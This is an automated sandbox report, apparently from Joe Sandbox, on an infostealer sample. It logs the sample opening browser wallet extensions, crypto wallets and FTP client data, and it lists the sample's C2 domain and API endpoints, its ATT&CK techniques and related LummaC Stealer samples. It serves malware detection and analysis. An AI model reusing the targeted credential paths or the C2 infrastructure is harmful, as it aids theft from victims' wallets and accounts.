            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: Yara matchFile source: 00000002.00000003.1799079639.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2196, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2196, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            311
            Process Injection
            1
            Masquerading
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            13
            Virtualization/Sandbox Evasion
            LSASS Memory151
            Security Software Discovery
            Remote Desktop Protocol31
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Disable or Modify Tools
            Security Account Manager13
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
            Process Injection
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
            Software Packing
            Cached Domain Credentials33
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            file.exe26%ReversingLabsWin32.Trojan.Generic
            file.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://disobey-curly.sbs/apiI0%Avira URL Cloudsafe
            https://disobey-curly.sbs:443/api0%Avira URL Cloudsafe
            https://disobey-curly.sbs:443/apiO0%Avira URL Cloudsafe
            https://disobey-curly.sbs/0%Avira URL Cloudsafe
            https://disobey-curly.sbs/apiu0%Avira URL Cloudsafe
            https://disobey-curly.sbs/u0%Avira URL Cloudsafe
            https://disobey-curly.sbs/api.0%Avira URL Cloudsafe
            https://disobey-curly.sbs/z0%Avira URL Cloudsafe
            https://disobey-curly.sbs/api0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            disobey-curly.sbs
            172.67.223.140
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://disobey-curly.sbs/apitrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgaspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://disobey-curly.sbs:443/apiOaspnet_regiis.exe, 00000002.00000003.1889111505.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C63000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1889212884.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003619928.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaaspnet_regiis.exe, 00000002.00000003.1796754164.0000000004F6B000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://upx.sf.netAmcache.hve.5.drfalse
                                high
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://disobey-curly.sbs/apiIaspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1750336942.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749313377.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726686158.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726503626.0000000005003000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1750336942.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749313377.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726686158.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726503626.0000000005003000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://disobey-curly.sbs/aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1797517806.0000000004F6D000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://disobey-curly.sbs/uaspnet_regiis.exe, 00000002.00000003.1819973696.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1823663645.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://disobey-curly.sbs:443/apiaspnet_regiis.exe, 00000002.00000002.2003619928.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1820026079.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://disobey-curly.sbs/zaspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgaspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiaspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.c.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://x1.i.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installaspnet_regiis.exe, 00000002.00000003.1726582628.0000000004F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.microsofaspnet_regiis.exe, 00000002.00000003.1726503626.0000000005005000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://disobey-curly.sbs/api.aspnet_regiis.exe, 00000002.00000002.2003656590.0000000002C92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesaspnet_regiis.exe, 00000002.00000003.1726582628.0000000004F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://disobey-curly.sbs/apiuaspnet_regiis.exe, 00000002.00000003.1836515078.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94aspnet_regiis.exe, 00000002.00000003.1796754164.0000000004F6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      172.67.223.140
                                                                      disobey-curly.sbsUnited States
                                                                      13335CLOUDFLARENETUStrue
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1561487
                                                                      Start date and time:2024-11-23 14:58:57 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 8m 2s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Run name:Run with higher sleep bypass
                                                                      Number of analysed new started processes analysed:10
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:file.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/7@1/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 50%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 9
                                                                      • Number of non-executed functions: 40
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target aspnet_regiis.exe, PID 2196 because there are no executed function
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: file.exe
                                                                      No simulations
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      172.67.223.1401JzM1JflOT.elfGet hashmaliciousMiraiBrowse
                                                                      • /goform/set_LimitClient_cfg
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSunturnedHack.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                      • 104.26.13.205
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.162.84
                                                                      xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      Aura.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.21.33.116
                                                                      injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.88.250
                                                                      injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.44.93
                                                                      injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.33.116
                                                                      loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.162.84
